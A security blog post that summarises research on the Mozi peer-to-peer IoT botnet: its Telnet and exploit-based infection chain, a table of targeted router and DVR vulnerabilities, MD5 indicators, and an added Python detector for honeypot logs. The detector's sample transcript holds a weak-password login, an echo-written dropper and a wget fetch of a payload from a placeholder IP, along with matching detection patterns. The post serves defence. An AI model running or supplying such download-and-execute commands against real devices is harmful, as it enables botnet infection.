Mozi Botnet [Based on DHT protocol]

Routers are actively being probed for weak Telnet passwords and taken over by a new peer-to-peer (P2P) botnet called Mozi. Mozi is related to the Gafgyt malware, reusing some of its code.

The Mozi Botnet uses its own extended DHT protocol to build a P2P network.

According to NetLab, who discovered this botnet, Mozi infects new devices through weak Telnet passwords and exploits. The infection process is as follows:

  • The current Bot node starts an HTTP service on a random local port to serve sample downloads, or receives a sample download address in the Config file issued by the Botnet Master. Either way, this provides the sample download address used for future infected targets.
  • The current Bot node logs in to the target device with a weak password, writes the downloader file using echo and runs it; the downloader then fetches the sample file from the download address provided by the current Bot node. Alternatively, the target is compromised with a vulnerability and then retrieves the sample file from that same download address.
  • The Mozi Bot sample runs on the infected target device, joins the Mozi P2P network as a new Mozi Bot node, and continues to infect other new devices.
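As an added example (not code from this post or from NetLab's report), the following Python detector looks for the infection sequence described above in a Telnet honeypot transcript: a login with a weak password, a dropper written with echo, that dropper being executed, and a fetch from a peer's HTTP service on a non-standard port. The transcript, the credential list and the patterns are constructed for illustration.

```python
import re

# Constructed Telnet honeypot transcript, not real Mozi traffic; one command per line.
SAMPLE_SESSION = """\
login: admin
password: admin
cd /tmp
echo -ne 'CONSTRUCTED_BYTES' > .dl
chmod +x .dl
./.dl
wget http://198.51.100.7:41227/sample.bin -O /tmp/x
"""

# Small constructed list of factory-default credentials the bot is described as trying.
WEAK_PASSWORDS = {"admin", "root", "1234", "password", ""}

# Stage patterns: echo-with-escapes redirected into a file, that file being made
# executable or run, and an HTTP(S)/TFTP fetch from an IP address with explicit port.
ECHO_WRITE = re.compile(r"\becho\s+-n?e\b.*?>{1,2}\s*(\S+)")
CHMOD_OR_RUN = re.compile(r"(?:chmod\s+\S*x\S*\s+|\./|\bsh\s+)(\S+)")
HTTP_FETCH = re.compile(r"\b(?:wget|curl|tftp)\b.*?https?://(\d{1,3}(?:\.\d{1,3}){3}):(\d+)")


def analyse_session(transcript: str) -> dict:
    """Return which stages of the described infection chain appear in the transcript."""
    found = {"weak_login": False, "echo_dropper": None,
             "dropper_run": False, "peer_fetch": None}
    for line in transcript.splitlines():
        line = line.strip()
        if line.startswith("password:"):
            found["weak_login"] = line.split(":", 1)[1].strip() in WEAK_PASSWORDS
            continue
        m = ECHO_WRITE.search(line)
        if m:
            found["echo_dropper"] = m.group(1)
            continue
        m = CHMOD_OR_RUN.search(line)
        dropper = found["echo_dropper"]
        if m and dropper and m.group(1).lstrip("./") == dropper.lstrip("./"):
            found["dropper_run"] = True
            continue
        m = HTTP_FETCH.search(line)
        if m:
            found["peer_fetch"] = (m.group(1), int(m.group(2)))
    # Verdict: all four stages present and the download came from a high (random) port.
    found["mozi_like"] = bool(found["weak_login"] and found["echo_dropper"]
                              and found["dropper_run"] and found["peer_fetch"]
                              and found["peer_fetch"][1] > 1024)
    return found
```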

The vulnerabilities used by Mozi Botnet are shown in the following table:

| Vulnerability | Affected device |
| --- | --- |
| Eir D1000 Wireless Router RCE | Eir D1000 Router |
| Vacron NVR RCE | Vacron NVR devices |
| CVE-2014-8361 | Devices using the Realtek SDK |
| Netgear cgi-bin Command Injection | Netgear R7000 and R6400 |
| Netgear setup.cgi unauthenticated RCE | DGN1000 Netgear routers |
| JAWS Webserver unauthenticated shell command execution | MVPower DVR |
| CVE-2017-17215 | Huawei Router HG532 |
| HNAP SoapAction-Header Command Execution | D-Link Devices |
| CVE-2018-10561, CVE-2018-10562 | GPON Routers |
| UPnP SOAP TelnetD Command Execution | D-Link Devices |
| CCTV/DVR Remote Code Execution | CCTV DVR |

IoC list

MD5:

eda730498b3d0a97066807a2d98909f3
849b165f28ae8b1cebe0c7430f44aff3

Further details can be found at https://blog.netlab.360.com/mozi-another-botnet-using-dht/

Jason Davies

UK based technology professional, with an interest in computer security and telecoms.
